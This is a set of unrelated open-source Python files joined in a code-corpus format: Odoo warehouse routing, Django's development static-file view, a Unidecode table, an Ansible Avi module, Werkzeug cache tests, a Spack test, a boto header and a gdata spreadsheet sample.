                        buy_pull_vals = self._get_buy_pull_rule(cr, uid, warehouse, context=context)
                        buy_pull_id = pull_obj.create(cr, uid, buy_pull_vals, context=context)
                        vals['buy_pull_id'] = buy_pull_id
            else:
                for warehouse in self.browse(cr, uid, ids, context=context):
                    if warehouse.buy_pull_id:
                        buy_pull_id = pull_obj.unlink(cr, uid, warehouse.buy_pull_id.id, context=context)
        # BUGFIX: the original passed context=None to super().write, silently
        # dropping the caller's context (language, company, ...).
        return super(stock_warehouse, self).write(cr, uid, ids, vals, context=context)

    def get_all_routes_for_wh(self, cr, uid, warehouse, context=None):
        """Add the buy route to the routes available for this warehouse."""
        all_routes = super(stock_warehouse, self).get_all_routes_for_wh(cr, uid, warehouse, context=context)
        if warehouse.buy_to_resupply and warehouse.buy_pull_id and warehouse.buy_pull_id.route_id:
            all_routes += [warehouse.buy_pull_id.route_id.id]
        return all_routes

    def _get_all_products_to_resupply(self, cr, uid, warehouse, context=None):
        """Exclude products already routed through this warehouse's buy route."""
        res = super(stock_warehouse, self)._get_all_products_to_resupply(cr, uid, warehouse, context=context)
        if warehouse.buy_pull_id and warehouse.buy_pull_id.route_id:
            # BUGFIX: iterate over a copy -- removing from the list being
            # iterated would skip the element following each removal.
            for product_id in list(res):
                for route in self.pool.get('product.product').browse(cr, uid, product_id, context=context).route_ids:
                    if route.id == warehouse.buy_pull_id.route_id.id:
                        res.remove(product_id)
                        break
        return res

    def _handle_renaming(self, cr, uid, warehouse, name, code, context=None):
        """Rename the buy pull rule along with the warehouse."""
        res = super(stock_warehouse, self)._handle_renaming(cr, uid, warehouse, name, code, context=context)
        pull_obj = self.pool.get('procurement.rule')
        #change the buy pull rule name
        if warehouse.buy_pull_id:
            pull_obj.write(cr, uid, warehouse.buy_pull_id.id, {'name': warehouse.buy_pull_id.name.replace(warehouse.name, name, 1)}, context=context)
        return res

    def change_route(self, cr, uid, ids, warehouse, new_reception_step=False, new_delivery_step=False, context=None):
        """Keep the buy rule's destination in sync with the incoming picking type."""
        res = super(stock_warehouse, self).change_route(cr, uid, ids, warehouse, new_reception_step=new_reception_step, new_delivery_step=new_delivery_step, context=context)
        if warehouse.in_type_id.default_location_dest_id != warehouse.buy_pull_id.location_id:
            self.pool.get('procurement.rule').write(cr, uid, warehouse.buy_pull_id.id, {'location_id': warehouse.in_type_id.default_location_dest_id.id}, context=context)
        return res
| agpl-3.0 |
amith01994/intellij-community | python/lib/Lib/site-packages/django/contrib/staticfiles/views.py | 71 | 6101 | """
Views and functions for serving static files. These are only to be used during
development, and SHOULD NOT be used in a production setting.
"""
import mimetypes
import os
import posixpath
import re
import stat
import urllib
from email.Utils import parsedate_tz, mktime_tz
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.http import Http404, HttpResponse, HttpResponseRedirect, HttpResponseNotModified
from django.template import loader, Template, Context, TemplateDoesNotExist
from django.utils.http import http_date
from django.contrib.staticfiles import finders, utils
def serve(request, path, document_root=None, show_indexes=False, insecure=False):
    """
    Serve static files below a given point in the directory structure or
    from locations inferred from the static files finders.

    To use, put a URL pattern such as::

        (r'^(?P<path>.*)$', 'django.contrib.staticfiles.views.serve')

    in your URLconf.

    If you provide the ``document_root`` parameter, the file won't be looked
    up with the staticfiles finders, but in the given filesystem path, e.g.::

        (r'^(?P<path>.*)$', 'django.contrib.staticfiles.views.serve', {'document_root' : '/path/to/my/files/'})

    You may also set ``show_indexes`` to ``True`` if you'd like to serve a
    basic index of the directory.  This index view will use the
    template hardcoded below, but if you'd like to override it, you can create
    a template called ``static/directory_index.html``.
    """
    if not settings.DEBUG and not insecure:
        raise ImproperlyConfigured("The view to serve static files can only "
                                   "be used if the DEBUG setting is True or "
                                   "the --insecure option of 'runserver' is "
                                   "used")
    if not document_root:
        # No explicit root: locate the file through the staticfiles finders.
        absolute_path = finders.find(path)
        if not absolute_path:
            raise Http404('"%s" could not be found' % path)
        document_root, path = os.path.split(absolute_path)
    # Clean up given path to only allow serving files below document_root.
    path = posixpath.normpath(urllib.unquote(path))
    path = path.lstrip('/')
    newpath = ''
    for part in path.split('/'):
        if not part:
            # Strip empty path components.
            continue
        drive, part = os.path.splitdrive(part)
        head, part = os.path.split(part)
        if part in (os.curdir, os.pardir):
            # Strip '.' and '..' in path.
            continue
        newpath = os.path.join(newpath, part).replace('\\', '/')
    if newpath and path != newpath:
        # Redirect to the normalized path so the URL shown is canonical.
        return HttpResponseRedirect(newpath)
    fullpath = os.path.join(document_root, newpath)
    if os.path.isdir(fullpath):
        if show_indexes:
            return directory_index(newpath, fullpath)
        raise Http404("Directory indexes are not allowed here.")
    if not os.path.exists(fullpath):
        raise Http404('"%s" does not exist' % fullpath)
    # Respect the If-Modified-Since header.
    statobj = os.stat(fullpath)
    mimetype, encoding = mimetypes.guess_type(fullpath)
    mimetype = mimetype or 'application/octet-stream'
    if not was_modified_since(request.META.get('HTTP_IF_MODIFIED_SINCE'),
                              statobj[stat.ST_MTIME], statobj[stat.ST_SIZE]):
        return HttpResponseNotModified(mimetype=mimetype)
    # BUGFIX: use a context manager so the file handle is closed promptly
    # instead of leaking it until garbage collection.
    with open(fullpath, 'rb') as f:
        contents = f.read()
    response = HttpResponse(contents, mimetype=mimetype)
    response["Last-Modified"] = http_date(statobj[stat.ST_MTIME])
    response["Content-Length"] = len(contents)
    if encoding:
        response["Content-Encoding"] = encoding
    return response
# Fallback template used by directory_index() when the project does not
# provide a 'static/directory_index(.html)' template of its own.
DEFAULT_DIRECTORY_INDEX_TEMPLATE = """
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" content="en-us" />
<meta name="robots" content="NONE,NOARCHIVE" />
<title>Index of {{ directory }}</title>
</head>
<body>
<h1>Index of {{ directory }}</h1>
<ul>
{% ifnotequal directory "/" %}
<li><a href="../">../</a></li>
{% endifnotequal %}
{% for f in file_list %}
<li><a href="{{ f|urlencode }}">{{ f }}</a></li>
{% endfor %}
</ul>
</body>
</html>
"""
def directory_index(path, fullpath):
    """Render a simple HTML listing of *fullpath* (used when show_indexes is True)."""
    try:
        template = loader.select_template([
            'static/directory_index.html',
            'static/directory_index',
        ])
    except TemplateDoesNotExist:
        # No project-supplied template: fall back to the built-in one.
        template = Template(DEFAULT_DIRECTORY_INDEX_TEMPLATE,
                            name='Default directory index template')
    entries = []
    for entry in os.listdir(fullpath):
        if entry.startswith('.'):
            continue
        if os.path.isdir(os.path.join(fullpath, entry)):
            entry += '/'
        entries.append(entry)
    context = Context({
        'directory' : path + '/',
        'file_list' : entries,
    })
    return HttpResponse(template.render(context))
def was_modified_since(header=None, mtime=0, size=0):
    """
    Was something modified since the user last downloaded it?

    header
      This is the value of the If-Modified-Since header.  If this is None,
      I'll just return True.

    mtime
      This is the modification time of the item we're talking about.

    size
      This is the size of the item we're talking about.
    """
    # No header means we cannot prove it is unmodified -- serve it.
    if header is None:
        return True
    try:
        matches = re.match(r"^([^;]+)(; length=([0-9]+))?$", header,
                           re.IGNORECASE)
        header_date = parsedate_tz(matches.group(1))
        if header_date is None:
            # Unparseable date: treat as modified.
            return True
        header_mtime = mktime_tz(header_date)
        header_len = matches.group(3)
        if header_len and int(header_len) != size:
            # Size mismatch invalidates the cached copy.
            return True
        return mtime > header_mtime
    except (AttributeError, ValueError, OverflowError):
        # Malformed header (no regex match / bad int / date overflow):
        # err on the side of re-serving the resource.
        return True
| apache-2.0 |
# Unidecode transliteration table for Unicode block U+FB00..U+FBFF
# (Alphabetic Presentation Forms: Latin ligatures, Armenian ligatures,
# Hebrew presentation forms, and Arabic presentation forms-A).
# Index into the tuple is the low byte of the code point; '[?]' marks
# characters with no ASCII approximation, '' maps to nothing.
data = (
    'ff', # 0x00
    'fi', # 0x01
    'fl', # 0x02
    'ffi', # 0x03
    'ffl', # 0x04
    'st', # 0x05
    'st', # 0x06
    '[?]', # 0x07
    '[?]', # 0x08
    '[?]', # 0x09
    '[?]', # 0x0a
    '[?]', # 0x0b
    '[?]', # 0x0c
    '[?]', # 0x0d
    '[?]', # 0x0e
    '[?]', # 0x0f
    '[?]', # 0x10
    '[?]', # 0x11
    '[?]', # 0x12
    'mn', # 0x13
    'me', # 0x14
    'mi', # 0x15
    'vn', # 0x16
    'mkh', # 0x17
    '[?]', # 0x18
    '[?]', # 0x19
    '[?]', # 0x1a
    '[?]', # 0x1b
    '[?]', # 0x1c
    'yi', # 0x1d
    '', # 0x1e
    'ay', # 0x1f
    '`', # 0x20
    '', # 0x21
    'd', # 0x22
    'h', # 0x23
    'k', # 0x24
    'l', # 0x25
    'm', # 0x26
    'm', # 0x27
    't', # 0x28
    '+', # 0x29
    'sh', # 0x2a
    's', # 0x2b
    'sh', # 0x2c
    's', # 0x2d
    'a', # 0x2e
    'a', # 0x2f
    '', # 0x30
    'b', # 0x31
    'g', # 0x32
    'd', # 0x33
    'h', # 0x34
    'v', # 0x35
    'z', # 0x36
    '[?]', # 0x37
    't', # 0x38
    'y', # 0x39
    'k', # 0x3a
    'k', # 0x3b
    'l', # 0x3c
    '[?]', # 0x3d
    'l', # 0x3e
    '[?]', # 0x3f
    'n', # 0x40
    'n', # 0x41
    '[?]', # 0x42
    'p', # 0x43
    'p', # 0x44
    '[?]', # 0x45
    'ts', # 0x46
    'ts', # 0x47
    'r', # 0x48
    'sh', # 0x49
    't', # 0x4a
    'vo', # 0x4b
    'b', # 0x4c
    'k', # 0x4d
    'p', # 0x4e
    'l', # 0x4f
    '', # 0x50
    '', # 0x51
    '', # 0x52
    '', # 0x53
    '', # 0x54
    '', # 0x55
    '', # 0x56
    '', # 0x57
    '', # 0x58
    '', # 0x59
    '', # 0x5a
    '', # 0x5b
    '', # 0x5c
    '', # 0x5d
    '', # 0x5e
    '', # 0x5f
    '', # 0x60
    '', # 0x61
    '', # 0x62
    '', # 0x63
    '', # 0x64
    '', # 0x65
    '', # 0x66
    '', # 0x67
    '', # 0x68
    '', # 0x69
    '', # 0x6a
    '', # 0x6b
    '', # 0x6c
    '', # 0x6d
    '', # 0x6e
    '', # 0x6f
    '', # 0x70
    '', # 0x71
    '', # 0x72
    '', # 0x73
    '', # 0x74
    '', # 0x75
    '', # 0x76
    '', # 0x77
    '', # 0x78
    '', # 0x79
    '', # 0x7a
    '', # 0x7b
    '', # 0x7c
    '', # 0x7d
    '', # 0x7e
    '', # 0x7f
    '', # 0x80
    '', # 0x81
    '', # 0x82
    '', # 0x83
    '', # 0x84
    '', # 0x85
    '', # 0x86
    '', # 0x87
    '', # 0x88
    '', # 0x89
    '', # 0x8a
    '', # 0x8b
    '', # 0x8c
    '', # 0x8d
    '', # 0x8e
    '', # 0x8f
    '', # 0x90
    '', # 0x91
    '', # 0x92
    '', # 0x93
    '', # 0x94
    '', # 0x95
    '', # 0x96
    '', # 0x97
    '', # 0x98
    '', # 0x99
    '', # 0x9a
    '', # 0x9b
    '', # 0x9c
    '', # 0x9d
    '', # 0x9e
    '', # 0x9f
    '', # 0xa0
    '', # 0xa1
    '', # 0xa2
    '', # 0xa3
    '', # 0xa4
    '', # 0xa5
    '', # 0xa6
    '', # 0xa7
    '', # 0xa8
    '', # 0xa9
    '', # 0xaa
    '', # 0xab
    '', # 0xac
    '', # 0xad
    '', # 0xae
    '', # 0xaf
    '', # 0xb0
    '', # 0xb1
    '[?]', # 0xb2
    '[?]', # 0xb3
    '[?]', # 0xb4
    '[?]', # 0xb5
    '[?]', # 0xb6
    '[?]', # 0xb7
    '[?]', # 0xb8
    '[?]', # 0xb9
    '[?]', # 0xba
    '[?]', # 0xbb
    '[?]', # 0xbc
    '[?]', # 0xbd
    '[?]', # 0xbe
    '[?]', # 0xbf
    '[?]', # 0xc0
    '[?]', # 0xc1
    '[?]', # 0xc2
    '[?]', # 0xc3
    '[?]', # 0xc4
    '[?]', # 0xc5
    '[?]', # 0xc6
    '[?]', # 0xc7
    '[?]', # 0xc8
    '[?]', # 0xc9
    '[?]', # 0xca
    '[?]', # 0xcb
    '[?]', # 0xcc
    '[?]', # 0xcd
    '[?]', # 0xce
    '[?]', # 0xcf
    '[?]', # 0xd0
    '[?]', # 0xd1
    '[?]', # 0xd2
    '', # 0xd3
    '', # 0xd4
    '', # 0xd5
    '', # 0xd6
    '', # 0xd7
    '', # 0xd8
    '', # 0xd9
    '', # 0xda
    '', # 0xdb
    '', # 0xdc
    '', # 0xdd
    '', # 0xde
    '', # 0xdf
    '', # 0xe0
    '', # 0xe1
    '', # 0xe2
    '', # 0xe3
    '', # 0xe4
    '', # 0xe5
    '', # 0xe6
    '', # 0xe7
    '', # 0xe8
    '', # 0xe9
    '', # 0xea
    '', # 0xeb
    '', # 0xec
    '', # 0xed
    '', # 0xee
    '', # 0xef
    '', # 0xf0
    '', # 0xf1
    '', # 0xf2
    '', # 0xf3
    '', # 0xf4
    '', # 0xf5
    '', # 0xf6
    '', # 0xf7
    '', # 0xf8
    '', # 0xf9
    '', # 0xfa
    '', # 0xfb
    '', # 0xfc
    '', # 0xfd
    '', # 0xfe
    '', # 0xff
)
| apache-2.0 |
SteveHNH/ansible | lib/ansible/modules/network/avi/avi_tenant.py | 27 | 3806 | #!/usr/bin/python
#
# Created on Aug 25, 2016
# @author: Gaurav Rastogi (grastogi@avinetworks.com)
# Eric Anderson (eanderson@avinetworks.com)
# module_check: supported
# Avi Version: 17.1.1
#
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_tenant
author: Gaurav Rastogi (grastogi@avinetworks.com)
short_description: Module for setup of Tenant Avi RESTful Object
description:
- This module is used to configure Tenant object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.3"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent","present"]
config_settings:
description:
- Tenantconfiguration settings for tenant.
created_by:
description:
- Creator of this tenant.
description:
description:
- User defined description for the object.
local:
description:
- Boolean flag to set local.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
name:
description:
- Name of the object.
required: true
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Unique object identifier of the object.
extends_documentation_fragment:
- avi
'''
EXAMPLES = '''
- name: Create Tenant using Service Engines in provider mode
avi_tenant:
controller: ''
password: ''
username: ''
config_settings:
se_in_provider_context: false
tenant_access_to_provider_se: true
tenant_vrf: false
description: VCenter, Open Stack, AWS Virtual services
local: true
name: Demo
'''
RETURN = '''
obj:
description: Tenant (api/tenant) object
returned: success, changed
type: dict
'''
# AnsibleModule is always available; the Avi SDK helpers are optional, so a
# failed import is recorded in HAS_AVI and reported from main() via
# fail_json() instead of crashing at import time.
from ansible.module_utils.basic import AnsibleModule
try:
    from ansible.module_utils.avi import (
        avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
    HAS_AVI = False
def main():
    """Entry point: build the tenant argument spec and drive the Avi API."""
    # Module-specific options; the shared Avi connection options (controller,
    # username, password, ...) are merged in below.
    spec = {
        'state': dict(default='present', choices=['absent', 'present']),
        'config_settings': dict(type='dict',),
        'created_by': dict(type='str',),
        'description': dict(type='str',),
        'local': dict(type='bool',),
        'name': dict(type='str', required=True),
        'url': dict(type='str',),
        'uuid': dict(type='str',),
    }
    spec.update(avi_common_argument_spec())
    module = AnsibleModule(argument_spec=spec, supports_check_mode=True)
    # Guard clause: without the SDK there is nothing we can do.
    if not HAS_AVI:
        return module.fail_json(msg=(
            'Avi python API SDK (avisdk>=17.1) is not installed. '
            'For more details visit https://github.com/avinetworks/sdk.'))
    # Delegate create/update/delete handling to the shared Avi helper.
    return avi_ansible_api(module, 'tenant',
                           set([]))
if __name__ == '__main__':
    main()
| gpl-3.0 |
bakerlover/project2 | lib/werkzeug/testsuite/contrib/cache.py | 94 | 7212 | # -*- coding: utf-8 -*-
"""
werkzeug.testsuite.cache
~~~~~~~~~~~~~~~~~~~~~~~~
Tests the cache system
:copyright: (c) 2013 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import os
import time
import unittest
import tempfile
import shutil
from werkzeug.testsuite import WerkzeugTestCase
from werkzeug.contrib import cache
# Probe for an optional, *reachable* Redis server: importing redis can succeed
# while no server is running, so issue a real SET and treat a connection
# failure the same as a missing library (redis = None skips the test case).
try:
    import redis
    try:
        from redis.exceptions import ConnectionError as RedisConnectionError
        cache.RedisCache(key_prefix='werkzeug-test-case:')._client.set('test','connection')
    except RedisConnectionError:
        redis = None
except ImportError:
    redis = None
# Probe the three interchangeable memcached client libraries in order of
# preference: pylibmc, the App Engine API, then python-memcache.
try:
    import pylibmc as memcache
except ImportError:
    try:
        from google.appengine.api import memcache
    except ImportError:
        try:
            import memcache
        except ImportError:
            memcache = None
class SimpleCacheTestCase(WerkzeugTestCase):
    """Exercises the in-memory SimpleCache backend."""

    def test_get_dict(self):
        store = cache.SimpleCache()
        for key in ('a', 'b'):
            store.set(key, key)
        fetched = store.get_dict('a', 'b')
        assert fetched.get('a') == 'a'
        assert fetched.get('b') == 'b'

    def test_set_many(self):
        store = cache.SimpleCache()
        # Accepts both a mapping ...
        store.set_many({0: 0, 1: 1, 2: 4})
        assert store.get(2) == 4
        # ... and an iterable of (key, value) pairs.
        store.set_many((i, i * i) for i in range(3))
        assert store.get(2) == 4
class FileSystemCacheTestCase(WerkzeugTestCase):
    """Tests for the file-backed cache.

    Each test creates its own temporary directory and removes it in a
    ``finally`` block so that a failing assertion or cache error cannot
    leak directories into the system temp area (previously only
    ``test_set_get`` cleaned up on failure).
    """

    def test_set_get(self):
        tmp_dir = tempfile.mkdtemp()
        try:
            c = cache.FileSystemCache(cache_dir=tmp_dir)
            for i in range(3):
                c.set(str(i), i * i)
            for i in range(3):
                result = c.get(str(i))
                assert result == i * i
        finally:
            shutil.rmtree(tmp_dir)

    def test_filesystemcache_prune(self):
        # Writing past the threshold must trigger pruning down to the limit.
        THRESHOLD = 13
        tmp_dir = tempfile.mkdtemp()
        try:
            c = cache.FileSystemCache(cache_dir=tmp_dir, threshold=THRESHOLD)
            for i in range(2 * THRESHOLD):
                c.set(str(i), i)
            cache_files = os.listdir(tmp_dir)
        finally:
            shutil.rmtree(tmp_dir)
        assert len(cache_files) <= THRESHOLD

    def test_filesystemcache_clear(self):
        tmp_dir = tempfile.mkdtemp()
        try:
            c = cache.FileSystemCache(cache_dir=tmp_dir)
            c.set('foo', 'bar')
            cache_files = os.listdir(tmp_dir)
            assert len(cache_files) == 1
            c.clear()
            cache_files = os.listdir(tmp_dir)
            assert len(cache_files) == 0
        finally:
            shutil.rmtree(tmp_dir)
class RedisCacheTestCase(WerkzeugTestCase):
    # Integration tests against a live Redis server; only collected by
    # suite() when the connection probe at import time succeeded.
    def make_cache(self):
        return cache.RedisCache(key_prefix='werkzeug-test-case:')
    def teardown(self):
        # Drop every key written under the test prefix after each test.
        self.make_cache().clear()
    def test_compat(self):
        # Values written through the raw client (bypassing the cache's own
        # serialization) must still be readable; numeric strings come back
        # as ints.
        c = self.make_cache()
        c._client.set(c.key_prefix + 'foo', b'Awesome')
        self.assert_equal(c.get('foo'), b'Awesome')
        c._client.set(c.key_prefix + 'foo', b'42')
        self.assert_equal(c.get('foo'), 42)
    def test_get_set(self):
        c = self.make_cache()
        c.set('foo', ['bar'])
        assert c.get('foo') == ['bar']
    def test_get_many(self):
        c = self.make_cache()
        c.set('foo', ['bar'])
        c.set('spam', 'eggs')
        assert c.get_many('foo', 'spam') == [['bar'], 'eggs']
    def test_set_many(self):
        c = self.make_cache()
        c.set_many({'foo': 'bar', 'spam': ['eggs']})
        assert c.get('foo') == 'bar'
        assert c.get('spam') == ['eggs']
    def test_expire(self):
        # Keys written with a 1 second timeout must be gone after 2 seconds.
        c = self.make_cache()
        c.set('foo', 'bar', 1)
        time.sleep(2)
        assert c.get('foo') is None
    def test_add(self):
        c = self.make_cache()
        # sanity check that add() works like set()
        c.add('foo', 'bar')
        assert c.get('foo') == 'bar'
        # ... but does not overwrite an existing key.
        c.add('foo', 'qux')
        assert c.get('foo') == 'bar'
    def test_delete(self):
        c = self.make_cache()
        c.add('foo', 'bar')
        assert c.get('foo') == 'bar'
        c.delete('foo')
        assert c.get('foo') is None
    def test_delete_many(self):
        c = self.make_cache()
        c.add('foo', 'bar')
        c.add('spam', 'eggs')
        c.delete_many('foo', 'spam')
        assert c.get('foo') is None
        assert c.get('spam') is None
    def test_inc_dec(self):
        # Note: the redis backend returns the new value from inc()/dec().
        c = self.make_cache()
        c.set('foo', 1)
        self.assert_equal(c.inc('foo'), 2)
        self.assert_equal(c.dec('foo'), 1)
        c.delete('foo')
    def test_true_false(self):
        # Booleans must round-trip through serialization unchanged.
        c = self.make_cache()
        c.set('foo', True)
        assert c.get('foo') == True
        c.set('bar', False)
        assert c.get('bar') == False
class MemcachedCacheTestCase(WerkzeugTestCase):
    # Integration tests against a live memcached server; only collected by
    # suite() when one of the client libraries could be imported.
    def make_cache(self):
        return cache.MemcachedCache(key_prefix='werkzeug-test-case:')
    def teardown(self):
        # Flush everything written under the test prefix after each test.
        self.make_cache().clear()
    def test_compat(self):
        # Values written through the raw client (bypassing the cache's own
        # serialization) must still be readable.
        c = self.make_cache()
        c._client.set(c.key_prefix + b'foo', 'bar')
        self.assert_equal(c.get('foo'), 'bar')
    def test_get_set(self):
        c = self.make_cache()
        c.set('foo', 'bar')
        self.assert_equal(c.get('foo'), 'bar')
    def test_get_many(self):
        c = self.make_cache()
        c.set('foo', 'bar')
        c.set('spam', 'eggs')
        self.assert_equal(c.get_many('foo', 'spam'), ['bar', 'eggs'])
    def test_set_many(self):
        c = self.make_cache()
        c.set_many({'foo': 'bar', 'spam': 'eggs'})
        self.assert_equal(c.get('foo'), 'bar')
        self.assert_equal(c.get('spam'), 'eggs')
    def test_expire(self):
        # Keys written with a 1 second timeout must be gone after 2 seconds.
        c = self.make_cache()
        c.set('foo', 'bar', 1)
        time.sleep(2)
        self.assert_is_none(c.get('foo'))
    def test_add(self):
        c = self.make_cache()
        # add() sets a missing key but never overwrites an existing one.
        c.add('foo', 'bar')
        self.assert_equal(c.get('foo'), 'bar')
        c.add('foo', 'baz')
        self.assert_equal(c.get('foo'), 'bar')
    def test_delete(self):
        c = self.make_cache()
        c.add('foo', 'bar')
        self.assert_equal(c.get('foo'), 'bar')
        c.delete('foo')
        self.assert_is_none(c.get('foo'))
    def test_delete_many(self):
        c = self.make_cache()
        c.add('foo', 'bar')
        c.add('spam', 'eggs')
        c.delete_many('foo', 'spam')
        self.assert_is_none(c.get('foo'))
        self.assert_is_none(c.get('spam'))
    def test_inc_dec(self):
        c = self.make_cache()
        c.set('foo', 1)
        # XXX: Is this an intended difference? Unlike the redis backend,
        # inc()/dec() return values are not asserted here, only the stored
        # result is checked.
        c.inc('foo')
        self.assert_equal(c.get('foo'), 2)
        c.dec('foo')
        self.assert_equal(c.get('foo'), 1)
    def test_true_false(self):
        # Booleans must round-trip through serialization unchanged.
        c = self.make_cache()
        c.set('foo', True)
        self.assert_equal(c.get('foo'), True)
        c.set('bar', False)
        self.assert_equal(c.get('bar'), False)
def suite():
    """Assemble the cache test suite, including backend-specific cases only
    when the corresponding server/library was detected at import time."""
    tests = unittest.TestSuite()
    for case in (SimpleCacheTestCase, FileSystemCacheTestCase):
        tests.addTest(unittest.makeSuite(case))
    if redis is not None:
        tests.addTest(unittest.makeSuite(RedisCacheTestCase))
    if memcache is not None:
        tests.addTest(unittest.makeSuite(MemcachedCacheTestCase))
    return tests
| apache-2.0 |
tmerrick1/spack | lib/spack/spack/test/cmd/cd.py | 5 | 1470 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack.main import SpackCommand
# Module-level fixture: a callable bound to the `spack cd` command.
cd = SpackCommand('cd')
def test_cd():
    """Sanity check: `spack cd` with no args prints the shell-init hint."""
    output = cd()
    assert "To initialize spack's shell commands, you must run one of" in output
| lgpl-2.1 |
jounex/hue | desktop/core/ext-py/boto-2.38.0/boto/fps/__init__.py | 429 | 1101 | # Copyright (c) 2008, Chris Moyer http://coredumped.org
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
| apache-2.0 |
jspraul/bite-project | deps/gdata-python-client/samples/spreadsheets/spreadsheetExample.py | 39 | 6433 | #!/usr/bin/python
#
# Copyright (C) 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = 'api.laurabeth@gmail.com (Laura Beth Lincoln)'
try:
from xml.etree import ElementTree
except ImportError:
from elementtree import ElementTree
import gdata.spreadsheet.service
import gdata.service
import atom.service
import gdata.spreadsheet
import atom
import getopt
import sys
import string
class SimpleCRUD:
  """Interactive create/read/update/delete demo for Google Spreadsheets.

  Legacy Python 2 sample code: uses print statements, raw_input() and
  ClientLogin-style ProgrammaticLogin authentication.
  """

  def __init__(self, email, password):
    # Log in immediately; ProgrammaticLogin() raises on bad credentials.
    self.gd_client = gdata.spreadsheet.service.SpreadsheetsService()
    self.gd_client.email = email
    self.gd_client.password = password
    self.gd_client.source = 'Spreadsheets GData Sample'
    self.gd_client.ProgrammaticLogin()
    self.curr_key = ''        # spreadsheet key chosen by the user
    self.curr_wksht_id = ''   # worksheet id chosen by the user
    self.list_feed = None     # cached list feed used by update/delete

  def _PromptForSpreadsheet(self):
    # Get the list of spreadsheets
    feed = self.gd_client.GetSpreadsheetsFeed()
    self._PrintFeed(feed)
    input = raw_input('\nSelection: ')
    # The spreadsheet key is the last path segment of the entry's id URL.
    id_parts = feed.entry[string.atoi(input)].id.text.split('/')
    self.curr_key = id_parts[len(id_parts) - 1]

  def _PromptForWorksheet(self):
    # Get the list of worksheets
    feed = self.gd_client.GetWorksheetsFeed(self.curr_key)
    self._PrintFeed(feed)
    input = raw_input('\nSelection: ')
    # The worksheet id is the last path segment of the entry's id URL.
    id_parts = feed.entry[string.atoi(input)].id.text.split('/')
    self.curr_wksht_id = id_parts[len(id_parts) - 1]

  def _PromptForCellsAction(self):
    # One round of the cells REPL: "dump" or "update {row} {col} {value}".
    print ('dump\n'
           'update {row} {col} {input_value}\n'
           '\n')
    input = raw_input('Command: ')
    command = input.split(' ', 1)
    if command[0] == 'dump':
      self._CellsGetAction()
    elif command[0] == 'update':
      parsed = command[1].split(' ', 2)
      if len(parsed) == 3:
        self._CellsUpdateAction(parsed[0], parsed[1], parsed[2])
      else:
        # No value given: clear the cell.
        self._CellsUpdateAction(parsed[0], parsed[1], '')
    else:
      self._InvalidCommandError(input)

  def _PromptForListAction(self):
    # One round of the list-feed REPL: dump/insert/update/delete.
    print ('dump\n'
           'insert {row_data} (example: insert label=content)\n'
           'update {row_index} {row_data}\n'
           'delete {row_index}\n'
           'Note: No uppercase letters in column names!\n'
           '\n')
    input = raw_input('Command: ')
    command = input.split(' ' , 1)
    if command[0] == 'dump':
      self._ListGetAction()
    elif command[0] == 'insert':
      self._ListInsertAction(command[1])
    elif command[0] == 'update':
      parsed = command[1].split(' ', 1)
